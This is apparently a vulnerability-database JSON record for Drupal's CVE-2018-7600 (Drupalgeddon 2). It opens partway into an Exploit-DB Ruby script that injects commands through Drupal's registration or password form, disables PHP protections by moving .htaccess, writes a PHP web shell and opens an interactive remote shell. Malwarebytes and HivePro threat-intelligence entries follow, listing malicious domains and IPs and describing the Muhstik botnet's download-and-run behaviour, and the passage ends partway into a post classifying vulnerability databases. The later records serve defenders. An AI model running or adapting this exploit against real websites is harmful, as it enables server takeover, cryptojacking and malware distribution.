\" [HTTP Size: #{response.size}]\" : \"\"\r\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n\r\n if $drupalverion.empty?\r\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\r\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\r\n # Try and get version from the URL (For Drupal v8.x)\r\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\r\n\r\n # If we got something, show it!\r\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\r\n end\r\n\r\n else\r\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\r\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n end\r\nend\r\n\r\n\r\n# Feedback\r\nif not $drupalverion.empty?\r\n status = $drupalverion.end_with?(\"x\")? \"?\" : \"!\"\r\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\r\nelse\r\n puts error(\"Didn't detect Drupal version\")\r\n exit\r\nend\r\n\r\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\r\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\r\n exit\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n\r\n# The attack vector to use\r\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\r\n\r\n# Make a request, check for form\r\nurl = \"#{$target}?q=#{$form}\"\r\nputs action(\"Testing: Form (#{$form})\")\r\nresponse = http_request(url, 'get', '', $session_cookie)\r\nif response.code == \"200\" and not response.body.empty?\r\n puts success(\"Result : Form valid\")\r\nelsif response['location']\r\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\r\n exit\r\nelsif response.code == \"404\"\r\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... 
Form disabled?\")\r\n exit\r\nelsif response.code == \"403\"\r\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\r\n exit\r\nelsif response.body.empty?\r\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\r\n exit\r\nelse\r\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\r\nend\r\n\r\n\r\nputs \"- \"*40\r\n\r\n\r\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\r\n# Drupal v7.x needs it anyway\r\n$clean_url = $drupalverion.start_with?(\"8\")? \"\" : \"?q=\"\r\nurl = \"#{$target}#{$form}\"\r\n\r\nputs action(\"Testing: Clean URLs\")\r\nresponse = http_request(url, 'get', '', $session_cookie)\r\nif response.code == \"200\" and not response.body.empty?\r\n puts success(\"Result : Clean URLs enabled\")\r\nelse\r\n $clean_url = \"?q=\"\r\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n\r\n # Drupal v8.x needs it to be enabled\r\n if $drupalverion.start_with?(\"8\")\r\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\r\n exit\r\n elsif $drupalverion.start_with?(\"7\")\r\n puts info(\"Isn't an issue for Drupal v7.x\")\r\n end\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Values in gen_evil_url for Drupal v8.x\r\nelementsv8 = [\r\n \"mail\",\r\n \"timezone\",\r\n]\r\n# Values in gen_evil_url for Drupal v7.x\r\nelementsv7 = [\r\n \"name\",\r\n]\r\n\r\nelements = $drupalverion.start_with?(\"8\") ? 
elementsv8 : elementsv7\r\n\r\nelements.each do|e|\r\n $element = e\r\n\r\n # Make a request, testing code execution\r\n puts action(\"Testing: Code Execution (Method: #{$element})\")\r\n\r\n # Generate a random string to see if we can echo it\r\n random = (0...8).map { (65 + rand(26)).chr }.join\r\n url, payload = gen_evil_url(\"echo #{random}\", e)\r\n\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\r\n result = clean_result(response.body)\r\n if not result.empty?\r\n puts success(\"Result : #{result}\")\r\n\r\n if response.body.match(/#{random}/)\r\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\r\n break\r\n\r\n else\r\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\r\n end\r\n\r\n else\r\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)\")\r\n end\r\n\r\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\r\n\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\r\n\r\n elsif response.body.empty?\r\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... 
Got an empty response\")\r\n exit\r\n\r\n else\r\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n exit\r\n end\r\n\r\n puts \"- \"*40 if e != elements.last\r\nend\r\n\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Location of web shell & used to signal if using PHP shell\r\nwebshellpath = \"\"\r\nprompt = \"drupalgeddon2\"\r\n\r\n# Possibles paths to try\r\npaths = [\r\n # Web root\r\n \"\",\r\n # Required for setup\r\n \"sites/default/\",\r\n \"sites/default/files/\",\r\n # They did something \"wrong\", chmod -R 0777 .\r\n #\"core/\",\r\n]\r\n# Check all (if doing web shell)\r\npaths.each do|path|\r\n # Check to see if there is already a file there\r\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\r\n\r\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\r\n if response.code == \"200\"\r\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\r\n else\r\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\r\n end\r\n\r\n puts \"- \"*40\r\n\r\n\r\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n folder = path.empty? ? 
\"./\" : path\r\n puts action(\"Testing: Writing To Web Root (#{folder})\")\r\n\r\n # Merge locations\r\n webshellpath = \"#{path}#{webshell}\"\r\n\r\n # Final command to execute\r\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\r\n\r\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\r\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\r\n if path == \"sites/default/files/\"\r\n puts action(\"Moving : ./sites/default/files/.htaccess\")\r\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\r\n end\r\n\r\n # Generate evil URLs\r\n url, payload = gen_evil_url(cmd, $element)\r\n # Make the request\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n # Check result\r\n if response.code == \"200\" and not response.body.empty?\r\n # Feedback\r\n result = clean_result(response.body)\r\n puts success(\"Result : #{result}\") if not result.empty?\r\n\r\n # Test to see if backdoor is there (if we managed to write it)\r\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\r\n if response.code == \"200\" and not response.body.empty?\r\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\r\n break\r\n\r\n elsif response.code == \"404\"\r\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\r\n\r\n elsif response.code == \"403\"\r\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\r\n\r\n elsif response.body.empty?\r\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... 
Got an empty response back\")\r\n\r\n else\r\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n end\r\n\r\n elsif response.code == \"500\" and not response.body.empty?\r\n puts warning(\"Target MAY of been exploited... Bit of blind leading the blind\")\r\n break\r\n\r\n elsif response.code == \"404\"\r\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\r\n\r\n elsif response.code == \"403\"\r\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\r\n\r\n elsif response.body.empty?\r\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\r\n\r\n else\r\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n end\r\n\r\n webshellpath = \"\"\r\n\r\n puts \"- \"*40 if path != paths.last\r\nend if try_phpshell\r\n\r\n# If a web path was set, we exploited using PHP!\r\nif not webshellpath.empty?\r\n # Get hostname for the prompt\r\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\r\n\r\n puts \"-\"*80\r\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\r\n# Should we be trying to call commands via PHP?\r\nelsif try_phpshell\r\n puts warning(\"FAILED : Couldn't find a writeable web path\")\r\n puts \"-\"*80\r\n puts action(\"Dropping back to direct OS commands\")\r\nend\r\n\r\n\r\n# Stop any CTRL + C action ;)\r\ntrap(\"INT\", \"SIG_IGN\")\r\n\r\n\r\n# Forever loop\r\nloop do\r\n # Default value\r\n result = \"~ERROR~\"\r\n\r\n # Get input\r\n command = Readline.readline(\"#{prompt}>> \", true).to_s\r\n\r\n # Check input\r\n puts warning(\"WARNING: Detected an known bad character (>)\") if command 
=~ />/\r\n\r\n # Exit\r\n break if command == \"exit\"\r\n\r\n # Blank link?\r\n next if command.empty?\r\n\r\n # If PHP web shell\r\n if not webshellpath.empty?\r\n # Send request\r\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\r\n # Direct OS commands\r\n else\r\n url, payload = gen_evil_url(command, $element, true)\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n\r\n # Check result\r\n if not response.body.empty?\r\n result = clean_result(response.body)\r\n end\r\n end\r\n\r\n # Feedback\r\n puts result\r\nend", "sourceHref": "https://www.exploit-db.com/download/44449", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. 
While each site owner is responsible for doing due diligence on their web properties, the outcome is typically websites that are severely out of date and exploited, often more than once.
Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. 
Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer or a Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages are a typical approach for delivering tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. 
It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. 
There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n 
cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", 
"title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2021-12-10T14:32:49", "description": "# drupal8-REST-RCE\nCVE-2019-6340 drupal8-REST-RCE (/node/1) , CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-31T22:55:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Drupal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6340", "CVE-2018-7600"], "modified": "2020-11-24T15:41:16", "id": "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "hivepro": [{"lastseen": "2022-03-29T16:43:01", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Muhstik malware has begun attacking Redis Servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw can be found in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variation that may be used to perform DDOS assaults. The threat actor first executes the Lua scripts to exploit the vulnerability found in Redis Debian servers. The threat actor attempts to download \"Russia.sh\" from \"106[.]246.224.219\" using wget or curl. It stores it as \"/tmp/russ\" and runs it, which downloads and runs a Linux payload from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. This botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks like flood attacks and SSH brute force attacks. 
The Mitre TTPs commonly used by Muhstik malware are: TA0001: Initial Access TA0011: Command and Control TA0042: Resource Development TA0008: Lateral Movement T1071: Application Layer Protocol T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1021.004: Remote Services: SSH T1059.004: Command and Scripting Interpreter: Unix Shell Vulnerability Details Indicators of Compromise (IoCs) Patch Links http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html https://security-tracker.debian.org/tracker/CVE-2022-0543 http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://github.com/g0rx/CVE-2018-7600-Drupal-RCE https://jira.atlassian.com/browse/CONFSERVER-67940 https://logging.apache.org/log4j/2.x/manual/migration.html References https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T12:17:03", "type": "hivepro", "title": "Muhstik botnet adds another vulnerability exploit to its arsenal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2018-7600", "CVE-2019-2725", "CVE-2022-0543"], "modified": "2022-03-29T12:17:03", "id": "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "href": "https://www.hivepro.com/muhstik-malware-botnet-adds-another-vulnerability-exploit-to-its-arsenal/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2018-08-03T12:56:42", "description": "What publicly available Vulnerability Databases do we have? Well, I can only say that there are a lot of them and they are pretty different. Here I make an attempt to classify them.\n\nIt's quite a thankless task. No matter how hard you try, the final result will be rather inaccurate and incomplete. I am sure someone will be complaining. But this is how I see it.  If you want to add or change something feel free to make a comment below or email [me@avleonov.com](<mailto:me@avleonov.com>).\n\nThe main classifier, which I came up with:\n\n * There are individual vulnerability databases in which one identifier means one vulnerability. They try to cover all existing vulnerabilities.\n * And others are security bulletins. They cover vulnerabilities in a particular product or products. And they are usually based on patches. One patch may cover multiple vulnerabilities.\n\nI made this diagram with some Vulnerability Databases. 
Note that I wanted to stay focused, so there are no exploit DBs, CERTs, lists of vulnerabilities detected by some researchers ([CISCO Talos](<https://www.talosintelligence.com/vulnerability_info>), [PT Research](<https://www.ptsecurity.com/ww-en/analytics/threatscape/>), etc.), Media and Bug Bounty sites.\n\n\n\nFor these databases the descriptions of vulnerabilities are publicly available on the site (in html interface or downloadable data feed), or exist in a form of paid Vulnerability Intelligence service (for example, [Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>)).\n\nOn one side there are databases of individual vulnerabilities, the most important is [National Vulnerability Database](<https://nvd.nist.gov/>). There are also Chinese, Japanese bases that can be derived from NVD or not.\n\nOn the other side we have security bulletins, for example [RedHat Security Advisories](<https://www.redhat.com/archives/rhsa-announce/>).\n\nAnd in the middle we have a Vulnerability Databases, for which it is not critical whether they have duplicated vulnerability IDs or not.\n\nThese are the Vulnerability Databases of aggregators, vulnerability scanners, security content databases. We can say that [CIS OVAL](<https://oval.cisecurity.org/>) or [OpenVAS NVTs](<http://www.openvas.org/openvas-nvt-feed.html>) are the forms of public security content. Russian [FSTEC BDU Vulnerability Database](<https://bdu.fstec.ru/vul>) also has individual vulnerabilities and security bulletins.\n\n### Classification\n\nI have the following groups:\n\n 1. Individual Vulnerabilities\n 2. Individual Vulnerabilities -> Government\n 3. Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators\n 4. Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators\n 5. Mixed Individual Vulnerabilities and Security Bulletins -> Government\n 6. 
Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules\n 7. Security Bulletins\n 8. Security Bulletins -> All software in repository\n\n### Registry\n\nI was trying to give a link to the same [\"Drupalgedon2\" CVE-2018-7600](<https://github.com/jirojo2/drupalgeddon2>) vulnerability in the examples, where it was possible. I mentioned the ways to grab all the entries from a particular Vulnerability Database in the Aggregation column. Most of these methods are provided by the owner of the Database (\"official\") or in the form of [Vulners collections](<https://avleonov.com/2016/10/24/processing-vulners-collections-using-python/>).\n\nName | Classification Group | Description | Example of content | Aggregation \n---|---|---|---|--- \n[Mitre CVE](<https://cve.mitre.org/>) | Individual Vulnerabilities | Coordinate the release of CVE identifiers | [CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) | [Official](<https://cve.mitre.org/data/downloads/index.html>) \n[IBM X force](<https://exchange.xforce.ibmcloud.com/>) | Individual Vulnerabilities | Threat and Vulnerability Intelligence service | [CVE-2018-7600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140913>) | n/a \n[NIST NVD](<https://nvd.nist.gov/>) | Individual Vulnerabilities -> Government | The NVD is the U.S. 
